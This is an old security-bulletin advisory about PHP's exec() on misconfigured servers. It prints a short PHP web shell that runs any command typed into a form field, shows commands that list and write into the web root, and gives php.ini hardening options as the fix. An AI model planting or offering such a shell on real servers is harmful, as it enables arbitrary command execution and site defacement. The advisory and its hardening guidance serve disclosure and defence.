12th Nov 2002 [SBWID-5799]
COMMAND
PHP execution and badly configured servers
SYSTEMS AFFECTED
?
PROBLEM
Thanks to Muammer ALTUNTA$ for the kind mail:
There is a PHP leak in the Unix system...
The leak is about the PHP exec function, like this....
------------------Begin Exploit--------------------------------
<pre>
<body>
<form method="POST" action="mx.php">
<p>
<input type="text" name="gorev" size="20" value="<? echo $gorev; ?>"><input type="submit" value="Submit" name="B1">
<input type="reset" value="Reset" name="B2"></p>
</form>
</body>
<?
if (strlen($gorev)==0)
{die("hatali socuk dizimi....");}
#####################################################
# CoDeD By Muammer ALTUNTA$ :)
#####################################################
exec($gorev,$mumi);
if (count($mumi)==0)
{
die("Hatali parametre weya Gorew reddedildi... geri donusumu olmayan komutlar haric...");
}
for ($i=0;$i<count($mumi);$i++)
{
echo $mumi[$i];echo "<br>";
}
?>
------------------End Exploit-----------------------------
You copy this PHP code into your www or public_html directory and run
it... When the PHP is run, please type id in the edit box... like
this...
id
uid=80(www) gid=80(www) groups=80(www)
whoami
www
hoo my uid is www in the FreeBSD :)
then go to the www directory /usr/local/www then type this command
ls -la /usr/local/www
drwxr-xr-x 8 www www 512 Apr 23 19:47 .
drwxr-xr-x 19 www www 512 Jun 9 02:02 ..
oh my god !!! the WWW directory is mine... :)
then type the command like this
mkdir /usr/local/www/data/nagat/tested
then the tested directory is created :) soon
touch /usr/local/www/data/nagat/tested/index.html
echo Yeah its Worked... >> /usr/local/www/data/nagat/tested/index.html
we control the web directory... is very good ...
there is an example link
http://sunburn.eng.emu.edu.tr/nagat/tested/
SOLUTION
Arkel [arkel@mad-troll.com] pointed out that this is just a configuration
problem; adjust as follows:
Three options, set in php.ini or httpd.conf, resolve the problem:
open_basedir, disable_functions, safe_mode
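
The three options named above, written out as a php.ini fragment. This is an added example, not part of the original advisory or of Arkel's mail; the site path is the one seen in the report, while the function list and the safe_mode_exec_dir path are assumptions chosen for illustration.

```ini
; Added example: constructed php.ini fragment, not from the original advisory.
; /usr/local/www/data/nagat/ is the site directory seen in the report.

; --- Weak: PHP's defaults, which leave exec() usable by any script ---
; disable_functions =
; open_basedir =
; safe_mode = Off

; --- Corrected ---
[PHP]
; Stops the exec($gorev, $mumi) call in the posted script outright.
; Disabling shell_exec also disables the backtick operator.
; The list is an assumed baseline covering the command-execution functions.
; This directive is honoured only in php.ini, not in httpd.conf.
disable_functions = exec,passthru,shell_exec,system,popen,proc_open

; Confines PHP file functions (fopen, include, mkdir, ...) to the site tree.
; Keep the trailing slash so the value is matched as a directory, not a prefix.
; It does not constrain programs started through exec(), so it complements
; disable_functions rather than replacing it.
open_basedir = /usr/local/www/data/nagat/

; PHP releases before 5.4.0 only (safe_mode was removed in 5.4.0).
; With safe_mode on, exec() can run only binaries in safe_mode_exec_dir.
; The directory below is a hypothetical, deliberately empty location.
; safe_mode = On
; safe_mode_exec_dir = /usr/local/php-safe-bin

; Per-site form of open_basedir for httpd.conf (mod_php):
;   <Directory "/usr/local/www/data/nagat">
;       php_admin_value open_basedir "/usr/local/www/data/nagat/"
;   </Directory>
```

After a restart, the output of phpinfo() shows the effective values, which is the quickest way to confirm that a per-directory override has not loosened them.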